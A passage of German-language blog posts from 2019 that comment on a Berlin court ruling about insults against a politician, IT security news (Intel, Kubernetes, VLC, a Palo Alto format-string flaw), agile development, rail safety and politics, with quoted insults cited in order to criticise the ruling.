Dann ordnet es insgesamt 22 Äußerungen (die oben habe ich alle aus diesen 22 Punkten zitiert) mit ein paar Sätzen ein. Und schafft damit effektiv den Beleidigungsparagraphen mal eben en passant ab. Jedenfalls, wenn es um Politiker und emotionale Themen geht.
Bonmots aus dem Urteil sind dann so Absätze wie:
"Soweit die Antragstellerin geltend macht, es liege mit "Stück Scheisse" und "Geisteskranke" eine Formalbeleidigung vor, steht dem entgegen, dass wie sich aus dem zweiten Satz ergibt eine Auseinandersetzung in der Sache erfolgte, so dass eine Formalbeleidigung ausscheidet".
"Auch in dem Kommentar 'Schlampe' kann eine von der Äußerung im kommentierten Post losgelöste primär auf eine Diffamierung der Person der Antragstellerin und nicht auf eine Auseinandersetzung in der Sache abzielende Äußerung nicht gesehen werden. Vielmehr ist auch dieser Kommentar ein Beitrag in einer Sachauseinandersetzung."
Wenn das stimmt, dann darf ich die Richter auf Grund dieses Urteils als "miese Ärsche" bezeichnen, weil sie ja über diesen Fall so schlecht zu Gericht _gesessen_ haben (*tusch*). Ich glaube da aber eher nicht dran.
Wirklich eklig wird es dann beim Filetstück des Urteils:
"Der Kommentar 'Drecks Fotze' bewegt sich haarscharf an der Grenze des von der Antragstellerin noch hinnehmbaren. Weil das Thema, mit dem sie vor vielen Jahren durch ihren Zwischenruf an die Öffentlichkeit gegangen ist sich ebenfalls im sexuellen Bereich befindet und die damals von ihr durch den Zwischenruf aus der Sicht der Öffentlichkeit zumindest nicht kritisierte Forderung der Entpönalisierung des gewaltfreien Geschlechtsverkehrs mit Kindern erhebliches Empörungspotential in der Gesellschaft hat, ist die Kammer jedoch der Ansicht, dass die Antragstellerin als Politikerin sich auch sehr weit überzogene Kritik gefallen lassen muss. Dass mit der Aussage alleine eine Diffamierung der Antragstellerin beabsichtigt ist, ohne Sachbezug zu der im kommentierten Post wiedergegebenen Äußerung ist nicht feststellbar."
Mit anderen Worten: "Drecks Fotze" ist schon okay, wenn es um ein emotional aufgeladenes Thema im Bereich Sexualität dreht. Nein. Einfach nein.
Das Gericht macht es sich mit dem Argument "Die ist Politikerin und muss viel aushalten, außerdem haben die sich ja über etwas aufgeregt und daher hat das einen sachlichen Anknüpfungspunkt" sehr viel zu einfach. Vieles davon ist eindeutig eine ~~Formalbeleidigung~~ Schmähkritik und meines Erachtens deutlich über die Grenze dessen, was Politiker(innen) sich bieten lassen müssen.
Auch eklig sind so Passagen wie:
"Die (…) Äußerung 'Knatter sie doch mal einer so richtig durch, bis sie wieder normal wird!' ist eine sicherlich geschmacklose Kritik, die mit dem Stilmittel der Polemik sachliche Kritik übt. Es geht dem Äußernden erkennbar nicht darum, die Antragstellerin als Person zu diffamieren, sondern an der von ihr getätigten Äußerung Kritik zu üben. Es liegt daher keine Beleidigung nach § 185 StGB vor. Die Antragstellerin wird nicht, wie sie dies meint, zum Gegenstand sexueller Fantasien gemacht."
Ja nee, ist klar. Das Gericht erklärt die These, an einem Menschen sollten bis zu dessen Meinungsänderung sexuelle Handlungen vorgenommen werden zu einem sachlichen Debattenbeitrag, der keine sexuellen Vorstellungen in Bezug auf diesen Menschen beinhaltet. Schönen Dank auch. Tolles Menschenbild hat das LG Berlin da.
Noch so eine Passage in die Richtung:
"Die Äußerung 'Die will auch nochmal Kind sein weil sonst keiner an die Eule ran geht!" ist eine mit dem Stilmittel der Ironie ausgedrückte Kritik an der im kommentierten Post wiedergegebenen Äußerung der Antragstellerin. Die Antragstellerin wird entgegen ihrer Meinung in dem Kommentar nicht wirklich zum Objekt sexueller Vorstellungen gemacht. Sicherlich macht sich der Kommentar ein wenig über die Antragstellerin lustig, eine Beleidigung liegt aber nicht vor."
Heißt übersetzt: Wenn jemand sich vorstellt, dass a) an die Politikerin keiner "ran geht" und b) die Politikerin aber will, dass jemand an sie "ran geht" und sie daher "auch nochmal Kind sein will", da es ja inhaltlich um Sex mit Kindern geht – dann ist das keine sexuelle Vorstellung mit der Politikerin als Gegenstand. Sondern inhaltliche Kritik mit dem Stilmittel der Ironie. So das LG Berlin.
Du hast irgendwann mal in einem Alternativlos Podcast den Begriff der 'fractal wrongness' benutzt. Dieses Urteil ist das juristische Paradebeispiel dafür. Das ist fraktal falsch. Egal welche Ebene man sich anguckt, man findet immer irgendwas, was völlig daneben ist.
(Einschub: Es gibt da tatsächlich einige Äußerungen, die ich noch für zulässig halte. Beispiel: Die Äußerung "Ich könnte bei solchen Aussagen diese Personen die Fresse polieren" ist (abgesehen vom Akkusativ/Dativ-Fehler) "okay", d.h. nicht nett aber rechtlich zulässig.)
Das Sahnehäubchen ist aber:
Das Gericht ist der Auffassung, dass die Politikerin sich das falsche Zitat (der Halle Leaks Blog, wir erinnern uns dunkel) voll als das eigene zurechnen lassen muss. Denn: Man könnte das Zitat ja in dieser Weise verstehen und sie hat dieser Interpretation nicht widersprochen.
Mit anderen Worten: Nicht die Meute ist schuld, nicht der Hetzer, der der Meute den vergifteten Brocken hingeworfen hat – sondern die Politikerin ist selbst schuld.
Das ist Victim Blaming vom Feinsten. Und natürlich ein Freibrief für all diejenigen, die "den gerechten Volkszorn" entfachen wollen.
Insofern: Dieses Urteil kann man mit Recht sehr ausführlich kritisieren. Ich hoffe sehr, dass es nicht hält. Denn sonst weiß ich echt nicht, wo bei Beleidigungen noch die Grenzen gezogen werden sollen, wenn das noch innerhalb des Erträglichen ist.
Nachlesen kann man das Urteil im Volltext übrigens bei den Anwälten der Politikerin.
Update: Der Einsender korrigierte nochmal ein formales Randdetail :-)

Tue Sep 17 2019

[l] Old and busted: Excel hat die Wirtschaft kaputtgemacht.
New hotness: Excel macht Genetik-Papers kaputt. Da gibt es ein Gen namens Septin-2, das wird häufig als SEPT2 abgekürzt, was Excel dann für das Datum "2. September" hält m(

Fri Sep 13 2019

[l] Gute Nachrichten! Intel sagt, sie hätten ihre CPUs jetzt sicher gemacht. Das sieht aus wie ein Artikel aber ist Werbung, ein "sponsored Post". Das kommt also direkt von Intel.
Im Fließtext rudern sie dann wieder ein bisschen zurück, denn wer seine Kunden in der Werbung direkt anlügt, der könnte schadensersatzpflichtig werden.
Mein Lieblings-Bullshit-PR-Satz in dem Artikel ist der hier:
Intel® says these side-channel leaks can only be maliciously exploited in the wild by highly sophisticated cyber-criminals. The archetypal hacker in the bedroom won't have the skills to abuse these flaws in the real world to steal information.
Was ist denn davon bitte die Aussage? Richtet sich irgendeine Security-Maßnahme nicht gegen "highly sophisticated cyber-criminals" sondern bloß gegen Kids, die noch bei ihren Eltern wohnen?
Ja gut, äh, außer Schlangenöl jetzt. (Danke, Daniel)

Wed Sep 4 2019

[l] Security-Patch-Backports eine schlechte Idee und "Long Term Support" ist eine Fata Morgana. Aktuelles Beispiel: Wie der Backport eines Spectre-Fixes in einen Linux-LTS-Kernel alles kaputtgemacht hat (CVE-2019-15902).
Es stellt sich nämlich raus, dass Back-Porting eher nicht von fähigen Spezialisten gemacht wird, weil die am aktuellen Kernel arbeiten.

Sat Aug 31 2019

[l] Die CSU hat ihre Drohung wahrgemacht und hat jetzt auch einen betont metrosexuellen Junghipster mit gefärbten Haaren, also einen CSU-Rezo, am Start. Der Typ spricht Hochdeutsch, ist jung, hat gefärbte Haare, trägt keine Tracht, und wirkt in dem Video nicht angetrunken. Er ist also das exakte Gegenteil dessen, was die CSU so als Basis hat.
Und was machen sie inhaltlich? Nichts, natürlich. Die CSU hat schon verstanden, dass sie lieber nicht über ihre Politik reden sollten, wenn sie potentielle Wähler ansprechen wollen.
Vom Duktus her passt das auch prima zu so reaktionären Youtube-Kanälen aus dem Infokrieger-Umfeld. Würde mich nicht wundern, wenn die einem später auch Gold, Naturheilkundepillen und Prepper-Bedarf verkaufen wollen würden. Ich werde das aber nicht prüfen, ich habe schon die erste Folge nur zur Hälfte ausgehalten. Nochmal gucke ich mir das sicher nicht an.
Update: Hier kommen lauter Leute rein, die sich aufregen, dass die CSU ihre Youtube-Kommentare löscht. Sagt mal ... habt ihr die letzten 10 Jahre in Kryoschlaf verbracht? Herzlich willkommen im Internet! Von allen Kritikpunkten, die man an der CSU anbringen kann, ist das ja wohl der lächerlichste. Außer man formuliert das so, dass Kommentar-Nachzensur auf Basis von Gesetzen nötig geworden ist, für die auch die CSU verantwortlich zeichnet.
Update: Diverse Leser haben auch die zweite Hälfte geguckt und weisen darauf hin, dass er bei ca 3 Minuten die Bertelsmann-Stiftung als Quelle zitiert, und ausdrücklich ansagt, die sei ja politisch unabhängig. Zugegeben, das ist ein weiteres Lowlight in dem Video, aber das Kosten-Nutzen-Verhältnis von Weitergucken reißt es auch nicht mehr raus.

Thu Aug 29 2019

[l] Hmm in gatling mit openssl ist noch irgendein Wurm drin, der mit mbedtls nicht auftritt, aber mbedtls hat dafür halt andere Nachteile (kann kein TLS 1.3 und sie haben gerade ihr API kaputtgemacht und ich muss das wohl neu portieren). Sorry für den Ausfall.
Ich baue da ja absichtlich keinen Watchdog mit Autorestart ein, damit es einen Leidensdruck gibt, das Problem mal zu debuggen und zu fixen.

Wed Aug 28 2019

[l] Liebe Leser, Demokratie lebt von Mitmachen. Werdet Wahlhelfer. Je mehr Wahlhelfer wir haben, desto unwahrscheinlicher sind Wahlmanipulationen durch Wahlhelfer.
„Keiner hat mich kontrolliert. Dann habe ich einfach ein paar blaue Stimmen grün gemacht“, sagt er – also Stimmzettel für die AfD als Kreuze für die Grünen gezählt.

Tue Aug 27 2019

[l] OK OK, Flughäfen können wir nicht, und unsere Autobahnen und -brücken sind alle marode, aber unsere Bahn ist doch wenigstens halbwegs sicher, oder?
Nun, wie sich rausstellt, … eher nicht.
Mit bis zu 100 km/h ist ein Zug über 100 Kilometer durch die Oberpfalz gerauscht - ohne funktionierende Bremsen. Die beiden Lokführer hatten den Bremsschlauch falsch gekoppelt und vor dem Fahrtbeginn keine Bremsprobe durchgeführt.
OMFG!
Update: Leserbrief dazu:
Entweder hat die SZ da was umformuliert oder die Pressemeldung der Bahn ist Unfug. Warum? Ich habe eine Ausbildung zum Rangierer gemacht und mein Bruder ist Lokführer. Also bisschen Kenntnis vorhanden.
- Ein Vertauschen der Druckleitungen geht eigentlich nicht, weil die Anschlüsse nicht untereinander passen
- Die Lokführer sind nicht die Leute, die die Verbindungen untereinander herstellen, sondern die Rangierer bzw. die Rangierleiter und die melden dem Lokführer Vollzug.
- Selbst wenn die zwei Loks nicht untereinander verbunden gewesen wären, hätte noch eine Lok Luft ins System pumpen können. In solchen Fällen werden aber zwei Loks nicht zum Bremsen verwendet, sondern um die Steigungen zu überwinden.
- Die Lokführer müssen den Angaben des Rangierers vertrauen und evtl. die das System überprüfen. Ist wie bei der Flugsicherung. Jeder hat seinen Verantwortungsbereich.
Es kann nur sein, dass die Lok gar nicht mit den ganzen Wagen verbunden war, weil im Gegensatz zu LKW das Prinzip bei Zügen umgekehrt ist. Bei LKW keine Luft im System bedeutet Bremsen fest. Bei Zügen keine Luft im System bedeutet Bremsen frei.
Trotzdem könnten die angeblichen 2 Loks noch selbstständig bremsen. Was natürlich bedeutet, dass es sehr, sehr lange Bremswege gibt, weil ja nur die Loks bremsen. Ist vergleichbar mit einem LKW, bei dem der Hänger nicht mitbremst.
Diese Meldung bei der SZ ist Unfug. So wie geschrieben, kann es nicht gewesen sein.
Update: Oh da habe ich ja Pandoras Füllhorn geöffnet. Jetzt kommen hier Dutzende von Einsprüchen von Bahn-Experten. Ein Repräsentativer:
Für die korrekte Funktion der Bremsen ist ausschließlich der Triebfahrzeugführer (kurz: Tf, vulgo Lokführer) verantwortlich. Dies ist ist in der Bremsvorschrift (BreVo, VDV-Schrift 757) geregelt und nennt sich Bremsprobe (Brpr).
Vereinfacht ausgedrückt stimmt es, dass der Zug (ohne Lok) vom Rangierpersonal zusammengestellt wird. Die Lok kann aber auch vom Lokführer angekoppelt werden. Dies kommt sowohl im Personenverkehr als auch im Güterverkehr regelmäßig vor, gerade dann wenn Lokomotiven von Drittfirmen beauftragt werden.
Güterzüge werden per Druckluftbremse gebremst, auch hier gilt das Prinzip: keine Luft in der Hauptluftleitung -> Bremsen liegen an! Dies ist ein essentielles Sicherheitsfeature im Zugverkehr. Wenn z.B. die Kupplung reißt, reißen auch die Bremsleitungen, diese werden entlüftet, die Bremsbacken werden dann per Federkraft angedrückt, es kommt zum Stillstand. Wenn ein rotes Signal überfahren oder die Notbremse gezögen wird, wird die Hauptluftleitung automatisch geöffnet, die Druck sinkt ab und es kommt zur Zwangsbremsung. Für mehr Details verweise ich auf diesen Wikipediaartikel.
Wenn Waggons angekoppelt werden, müsssen bei nach dem Verbindungen der Druckluftleitungen die Ventile geöffnet werden. Beim Abkoppeln werden diese geschlossen, erst dann wird die Verbindung getrennt. Damit ein Rangierbetrieb möglich ist und Züge in Rangierbahnhöfen z.B. über Ablaufberge einfach zusammengestellt werden können, gibt es die Möglichkeit einzelen Waggons "unter Druck" abzustellen mit Hilfe der Verwendung von speziellen Ventilen. Das ist allerdings nur sehr vereinfacht ausgedrückt.
Ich vermute bei diesem Fall, dass beim Ankuppeln irgendein Ventil nicht richtig bedient wurde. Zusammen mit der nicht erfolgten Bremsprobe waren alle Waggons mit gefüllter Hauptluftleitung (so weit normal) unterwegs. Allerdings konnte diese dann nicht mehr vom Steuerstand aus entlüftet (nicht normal) und somit der Zug abgebremst werden. Den Rest kennen wir ja ;)
(Danke, Christian)

Sun Aug 25 2019

[l] Macron hat zum G7-Gipfel den Außenminister des Iran eingeflogen. Ohne jemand anderem was zu sagen. Insbesondere ohne dem Weißen Haus was zu sagen.
Entsprechend groß war die freudige Überraschung. Macron zieht sich diplomatisch aus der Affäre, indem er sagt, das habe nichts mit G7 zu tun gehabt, der sei nur zufällig zu einer völlig anderen Sache in das kleine gallische Dörflein gekommen.
Ich muss ja sagen, dass der Macron damit ein paar Sympathiepunkte gutgemacht hat bei mir :-)

Thu Aug 22 2019

[l] In Sachsen nähert sich die SPD der 5-Prozent-Hürde. Damit hat die "Große Koalition" dort keine Mehrheit mehr. Dass die aber auch immer alle unbedingt keinesfalls aus ihren Fehlern lernen wollen. Klar fahren wir viel zu schnell auf die Betonwand da hinten zu, aber solange es nicht Bumms gemacht hat, sehen wir keinen Handlungsbedarf!1!!
Good riddance.
Die Grünen haben ja schon das Absenkden des Wahlalters wieder ins Gespräch gebracht. Ich erwarte, dass bald auch wieder bei der SPD ein Talking Point wird. Was anderes haben die ja auch nicht mehr. Und ab, husch husch, liebe Verräterpartei, in die außerparlamentarische Opposition.
Update: Oh gucke mal, in Brandenburg legt die SPD in Umfragen deutlich zu. In Brandenburg hat allerdings seit der Wende immer nur die SPD die Regierung gestellt. Die Leute da wollen das offenbar nicht anders.

Wed Aug 21 2019

[l] Leserbrief zu Cisco und Security:
du musst jetzt tapfer sein. Updates im Netzwerkbereich werden gemacht wenn die Hardware getauscht wird. Oder wenn einen funktionalen Bug gibt der die Arbeit stört. Also meistens zumindest. Ausnahmen bestätigen die Regel.
Beispiele:
1. Vor vielen Jahren hab ich in einem Projekt man ein Tool zum Config Backup (rancid) aufgesetzt und mit einem Tool zum Config Audit (nipper, war damals noch OpenSource) verheiratet.. Dazu noch ein wenig Shell und es gab eine mehr oder weniger schöne Webseite mit einem Report. Das ganze für einen Laden eine hohe zweistellige Anzahl von Cisco "Firewalls" speziell für site-2-site VPNs im Einsatz hatte. Musste ich wieder abstellen weil zu viel Rot. Und Updates wären zu viel Arbeit. Gut, wahrscheinlich waren viele der Verwundbarkeiten überhaupt nicht relevant für den Einsatzzweck, aber für die Security eines Outsourcing Ladens ist das schon eine komische Einstellung.
  Der Laden nahm ITIL sehr ernst und als es ein Ticket zu "die CheckPoint braucht mal dringend Updates und vor allem mehr RAM" für die interne Firewall gab wurde das wegen eines zu hohen Risikos abgelehnt. Ein paar Tage später ist sie dann ausgefallen und es konnte gar nicht schnell genug gehen bis sie wieder ging.
2. Vor etwas weniger Jahren hab ich mich mal um das Netz eines Kunden gekümmert. Inkl. BGP zur Außenwelt. Einer der großen Hersteller (IIRC Juniper) hatte einen Bug in der BGP Implementierung. $Carrier schickte eine Mail das sie ganz dringend Updates machen. Das Update erforderte einen Reboot. Nur: Die BGP Session stand noch 2 Wochen danach. Dann gab es Tagsüber einen kurzen Schluckauf. Wahrscheinlich hat irgendwer im Internet mal die passenden Pakete an den Router geschickt und das Teil hat rebootet. Da das nicht noch mal passiert ist, gehe ich davon aus, dass mit dem Reboot auch die neue Softwareversion hoch kam.
3. Vor noch weniger Jahren hab ich für einen anderen Kunden Netzkram gemacht. Da lieft mir in irgendeinem IRC Channel ein Hinweis zu einem Cisco Bug über den Weg. Betraf alle der Hauptswitche im Office. Habs abgestellt, den Kollegen von der Security und den Netzwerkern am anderen Standort den Link geschickt. Die Security fand das cool das einer mitdenkt und hat sich bedankt. Von den Kollegen am anderen Standort gab es 2 Wochen später eine Reaktion. Da haben sie von dem Problem bei Heise gelesen und musst mich ganz dringend auf den Bug hinweisen.
4. Und dann war da noch der Laden mit dem Cisco WLAN Controller der das WLAN absichern sollte. Also eigentlich eine Kiste zum Management von Accesspoints. Sowas will man in einer großen Umgebung haben und die Dinger funktionieren im Normalfall sogar. Der Fall war nicht normal, weil die viele tausende Euro Appliance hing einfach so im Rack. Ohne Netzwerkkabel und vor allem ohne Strom.
5. Cisco hatte da mal eine ganze tolle Management Software. Da konnte man dann u.A. zu allen IOS Versionen im Netz die passenden Bugs raus suchen. Mir hat das Teil beim Kunden immer was davon erzählt, dass es keine Bugs gibt. Bis ich dann mal mit tcpdump / Wireshark geschaut habe. Das Tool rief eine Webseite von Cisco auf (http!) und bekam einen 404 zurück.
Ich glaube übrigens nicht, dass die Software bei anderen Herstellen besser ist. Von den anderen hört man nur weniger. IIRC hab ich auch noch nie einen anderen Hersteller gesehen der selbst Bugs auf Security Mailinglisten veröffentlicht.
Der Kollege hat inhaltlich natürlich völlig Recht. Genau so sieht das in der Industrie aus. Aber ich habe mir noch nie einen schönen Rant voller gerechtem Zorn von Fakten oder der Realität kaputtmachen lassen!1!!

Wed Aug 14 2019

[l] Gaby Weber hatte doch bei der EZB nach Dokumenten zu deren Geldvergabe an Bayer gefragt. Der Hintergrund war, ob die EZB "due diligence" gemacht hat, also ob es für die überhaupt eine Rolle gespielt hat, was Bayer mit der Kohle machen würde, zumal für alle (anderen?) Beobachter klar war, dass der Kauf von Monsanto für Bayer existenzgefährdende Risiken mit sich brächte. Da könnte man ja sagen: Die EZB ist in der Pflicht, Bayer kein Geld zu geben, wenn die damit so einen Scheiß machen, denn auf dem Papier ist das Geld ja nicht geschenkt sondern ein Kredit, und wenn Bayer damit Selbstzerstörung betreibt, dann platzt ja die Rückzahlung.
Jetzt kam die Antwort der EZB und die pullen da ernsthaft einen De Maiziere! Oder eigentlich eher so einen De Maiziere.
Sie argumentieren grob, dass das Programm den Markt nicht beeinträchtigen soll, und wenn sie jetzt sagen würden, wie ihre Investmententscheidungen aussehen, dann könnten fiese Spekulanten das ausnutzen und den Markt verzerren und damit das Programm kaputtmachen.
Nun will sich Gaby Weber im Gegensatz zur deutschen Presse mit solchen fadenscheinigen Ausreden nicht abspeisen lassen und sammelt jetzt Spenden, damit sie vor das Bundesverwaltungsgericht oder den EugH gehen kann.
Ich persönlich finde die Begründung unbefriedigend, denn der Markt wird natürlich schon durch den EZB-Kauf verzerrt, nicht erst durch Bekanntwerden des Entscheidungsweges. Ich bin ja immer wieder fasziniert über die Bullshit-Euphemismen bei Ökonomen, die bei Umweltschutzauflagen von Marktverzerrung sprechen, aber bei staatlichen Stützkäufen von Liquiditätssicherung und Marktstabilisierung.

Sat Aug 10 2019

[l] Meine Damen und Herren, das hier ist ja wohl der klarste Fall von Selbstmord, den wir hier je hatten!
“Saturday, August 10, 2019, at approximately 6.30am, inmate Jeffrey Edward Epstein was found unresponsive in his cell … subsequently pronounced dead by hospital staff,” reads a statement from the Metropolitan Correctional Center where Epstein, 66, had been held without bail since his arrest on 6 July on charges of sex trafficking girls as young as 14. […]
Epstein’s circle of friends and acquaintances has included Donald Trump; Bill Clinton; Prince Andrew; Leslie Wexner, founder of the company that owns the Victoria’s Secret lingerie brand; and many other prominent names in law, entertainment and politics.
Herzversagen?
Wer das für realistisch hält, dass sich jemand so wichtiges im Knast umbringt, der sei daran erinnert, was die Amis mit Chelsey Manning gemacht haben. Die haben schlicht behauptet, die sei möglicherweise selbstmordgefährdet, und damit haben sie dann Isolationshaft, Schlafentzug durch Dauerbeleuchtung der Zelle und anderes begründet.

Fri Aug 9 2019

[l] War ja klar, jetzt kriege ich Gegenwind von sich beleidigt fühlenden Agil-Proponenten.
Ich bin ja immer wieder beeindruckt über die Scheuklappen, die sich diese Leute in kürzester Zeit hinbauen. Bestimmt mit agilen Methoden gebaut. Funktionieren prächtig, solange man keine Fragen stellt.
Es gibt einige auffallende Muster. Eines davon: Struktur im Prozess der Softwareentwicklung wird gleichgesetzt mit Struktur in der resultierenden Software. Wenn ihr den Unterschied nicht versteht, dann schreibt mir bitte keine Mails. Dafür ist mir meine Zeit zu schade.
Ein anderes: Google ist der Heiland im agilen Himmel. Hunderte von Projekten haben Dinge "wie Google" gemacht, weil Google ja ganz gut läuft, und für vom Marktführer klauen ist noch niemand bestraft worden. Aber in der Sekunde, wo ein Google-Projekt genau die selben Fail-Symptome zeigt wie eure ganzen Agil-Projekte, da ist das alles vergessen. Es setzt nicht etwa Reflektion ein, sondern ein Beißreflex. Nein nein, Fefe, nicht agile Methoden sind inhärent kacke, nur weil niemand die richtig angewendet kriegt, nicht mal der Marktführer, den alle emulieren!1!!
Mich erinnert das an meinen ersten Code Audit bei Microsoft. Die verwenden natürlich intern auch Exchange und Active Directory und so. Wenn man das anderswo sieht, denkt man sich, die waren bloß zu blöde, das ordentlich aufzusetzen. Und dann geht man zu Microsoft und die sagen einem völlig unironisch, die Replikation des Accounts durch das Active Directory kann schon mal drei Tage dauern. Das ist der Zeitpunkt, wo man als zu eigenständigen Gedanken fähiger Beobachter erkennt, dass es nicht die schlechte Umsetzung überall ist, sondern ein inhärentes Problem mit dem Produkt oder System.
Ich habe im Übrigen nicht behauptet, dass alle agilen Projekte so enden. Das habt ihr da reingelesen. Nicht ganz zu Unrecht, denn die Quote ist in der Tat furchterregend, aber das war nicht meine Behauptung. Ihr müsst mal dringend an eurer Lesekompetenz arbeiten, wenn ihr mir Leserbriefe schreiben wollt.

Thu Aug 8 2019

[l] Kubernetes wurde auditiert und der Bericht veröffentlicht. Das Ergebnis: 37 Sicherheitslücken gefunden, davon 5 mit hoher Gefahr. Die Zahlen sind erstmal belanglos, solange wir nicht wissen, wie viele Leute wie lange gesucht haben. Die Primärquelle schreibt:
The Security Audit Working Group managed the audit over a four month time span.
OK. Also das ist dann ziemlich katastrophal. Wenn die Auditoren nach vier Monaten Arbeit nur 37 Bugs gefunden haben, bei einem Projekt dieser Größe, dann heißt das im Allgemeinen, dass der Code so komplex und unverständlich war, dass man nicht entscheiden konnte, ob etwas ein Bug ist oder nicht, bis man da eine Woche dran herumgeforscht hat.
Leider klingt das auch hier so:
Die Prüfer haben sich allerdings bei der Untersuchung auch nur auf acht Kernkomponenten der Software beschränkt und nur jene Probleme der Implementierung betrachtet, die "offensichtlich falsch" seien. Auch habe der Fokus der Untersuchung eher auf "Breite statt Tiefe" gelegen.
Das klingt nach Nebelwand-Jargon für "wir haben nach Bugs gegreppt". Nach Bugs greppen macht man, wenn ein Projekt zu komplex ist, um es in der gegebenen Zeit sinnvoll zu verstehen zu versuchen. Bei vier Monaten Zeit könnt ihr euch ja selbst überlegen, wie krass überkomplex und unterverständlich das Projekt sein muss, damit Auditoren das machen. Der andere Indikator dafür ist "wir haben Fuzzing gemacht".
Die Auditoren kritisieren auch die hohe Komplexität von Kubernetes. Wir erinnern uns: Kubernetes war das Tool, das uns vor der Komplexität von Containern retten sollte. Das ist jetzt selber so komplex, dass es ein Rettungsprojekt braucht.
So wird Kubernetes als System mit "erheblicher Komplexität" bezeichnet. Ebenso seien die Konfiguration und das Deployment nicht trivial. Das wieder liege an "verwirrenden Standardeinstellungen, fehlenden Steuerungselementen und nur implizit definierten Security-Kontrollelementen".
[…] So habe die riesige Codebasis große Teile mit nur "minimaler Dokumentation" sowie zahlreiche externe Abhängigkeiten. Außerdem gebe es viele Stellen, an denen bestimmte Programmlogik einfach reimplementiert wird.
Das, meine Damen und Herren, ist das Ergebnis von agilen Methoden in der Softwareentwicklung. Genau das passiert, wenn man ein Projekt agil implementiert. Dann wird solange gefrickelt, bis den Use Case abdeckt, aber die interne Struktur ist Kraut und Rüben, Dokumentation "machen wir später" und sowas wie Codestruktur gibt es nicht oder nur zufällig.
Mir ist ja echt schleierhaft, wieso immer noch Leute auf diesen Agil-Hokuspokus reinfallen. Ich hatte gehofft, die Zeit von Wunderheilern und anderem Aberglauben ist vorbei. (Danke, Marian)

Thu Jul 25 2019

[l] Die VLC-Entwickler regen sich gerade auf Twitter darüber auf, wie die Presse mit ihren Sicherheitslücken umgeht, oder in diesem Fall eine Sicherheitslücke in einer Komponente, die VLC verwendet. VLC findet, wenn sie libebml verwenden (eine Komponente für das Matroska-Containerformat, MKV und WEBM-Dateien), und da ist eine Lücke drin, dann ist das nicht ihre Schuld.
Dem würde ich generell widersprechen wollen. Doch, ist es. Das ist genau die Nummer Eins Gefahr, die von der steigenden Komplexität ausgeht. Gerade bei vlc, wenn man das mal selber baut und startet, und mal die Shared Libraries zählt, die das Ding reinlutscht, dann ist völlig klar, dass das Risiko enorm zugenommen hat, bis hin zur offensichtlichen Nicht-Beherrschbarkeit. Klar, dafür hängt da auch die Funktionalität von ab. Will ich nicht bestreiten. Aber die Laxheit, mit der Leute fremde Libraries reinladen, und dann so tun, als sei das nicht ihr Problem, wenn die räudig sind, die ärgert mich schon lange.
Auf der andere Seite ist das Problem in libebml zu dem Zeitpunkt seit über einem Jahr bekannt und upstream gefixt gewesen, aber die Knödel von Ubuntu haben es verpeilt, den Fix auszuliefern. Insofern bin ich dann doch auf der Seite von VLC in dieser Sache, denn das Sicherheitsloch war in Ubuntu, nicht VLC.
Die Geschichte ging aber noch weiter. Die VLC-Leute berichten, dass der Fuzzy, der die Lücke gefunden hat, direkt ein CVE beantragt und bekommen hat, ohne dass jemand auf dem Weg es für nötig oder höflich gefunden hätte, bei VLC mal nachzufragen. Nicht nur das: Der CERT-Bund, immerhin eine Regierungsorganisation Deutschlands, hat ein Advisory veröffentlicht, auch ohne bei VLC mal nachzufragen.
Da wird die Sache jetzt ein bisschen weniger klar. Denn VLC betreibt einen offenen Bugtracker, aber möchte gerne Security-Sachen per Mail vorab gemeldet kriegen, damit die mit Priorität bearbeitet werden können. Das will ich mal der Klarheit halber umformulieren: VLC hat einen Bugtracker, den sie als sedimentäre Datenhalde betreiben, und wo sie längst die Kontrolle über die Flut an Bugs verloren haben, daher haben sie eine Parallelgesellschaft in Form von einem Security-Bug-Mailverteiler geschaffen. Das, meine lieben VLC-Leute, habe ihr euch vollumfänglich selbst zuzuschreiben. Euer Bugtracker ist öffentlich, und das ist gut so. Dort hatte der Bug-Finder einen Bug aufgemacht. Den habt ihr mit den anderen Bugs in der ewigen Buglavine verpennt. Als Reporter ist es völlig OK, VLC nicht "Bescheid" zu sagen, wenn es einen offenen Bugtracker gibt. Denn dafür gibt es den. Und dafür ist der offen. Damit man sich dort über Bugs informieren kann. Dass ihr jetzt von der Presse verlangt, dass sie die Kosten für euer verkacktes Bugtracking trägt, ist absurd. DAS habt ihr euch echt selbst zuzuschreiben.
Und jetzt hört auf zu heulen, fixt eure Bugs, und haltet die andere Wange hin. Mit eurem Fake-News-Geschreie macht ihr die Sache nur noch schlechter.

Tue Jul 23 2019

[l] Leserbrief zu Palo Alto Remote Code Execution:
Als ich "100% reliable preauth RCE VPN exploit using format strings" gelesen habe, wurde ich neugierig. Auf modernen Linux-Systemen ist das nämlich nicht ganz so einfach, also habe ich mich auf die Lektüre eines schönen Exploits gefreut. Stattdessen finde ich so ziemlich das einfachste, was so geht. Daher mal ein paar Worte dazu, damit auch Laien das etwas besser einordnen können:
Format-String-Lücken sind sehr einfach über statische Codechecker zu finden. Quasi jeder Audit hätte das finden sollen. Mit entsprechenden Compiler-Optionen gibt es da auch Warnings.
Bei modernen Linux-Systemen wird sowas auch zur Laufzeit abgefangen: da wird dann nachgeschaut, ob %n in schreibbarem Speicher liegt (= nicht fest einkompiliert, also eventuell von einem Angreifer). Falls ja, wird abgebrochen. Dadurch ist die Lücke nicht komplett weg, aber zumindest Code-Execution wird erheblich erschwert bis unmöglich gemacht, da %n das Arbeitspferd für Code-Execution-Exploits ist. Dazu muss man nicht einmal am Quellcode schrauben.
Der Exploit scheint feste Offsets zu benutzen. Also gibt es da auch keine Address Space Layout Randomization?
Zudem treibt deren Exploit Schindluder mit Global Offset Table und Procedure Linkage Table. Dagegen gibt es RELRO: entsprechende Bereiche sind zu normalen Laufzeit nicht mehr schreibbar, wodurch es nochmal etwas schwieriger wird, einen Exploit zu erstellen.
Ich habe keinen Zugang zum Produkt, daher sind das alles unverifizierte Vermutungen. Aber scheinbar sind die echt noch in der Steinzeit, unfassbar. Oh, und je nach CPU-Architektur sind diese Sachen auch gut in Binärcode zu finden. Ich würde also davon ausgehen, dass kompetente Geheimdienste das kannten.
Dazu ein bisschen Kommentar von mir: Format String Bugs sind in der Tat vergleichsweise einfach zu finden. Wer die in seinem Code hat, hat wenig Ausreden vorzubringen. Aber ganz so trivial ist es dann doch nicht. In der Praxis findet man häufig irgendwelche Präprozessor-Makro-Höllen und Ketten von Funktionen und am besten noch nichts const deklariert. Insofern: Vergleichsweise einfach, aber nicht unbedingt trivial.
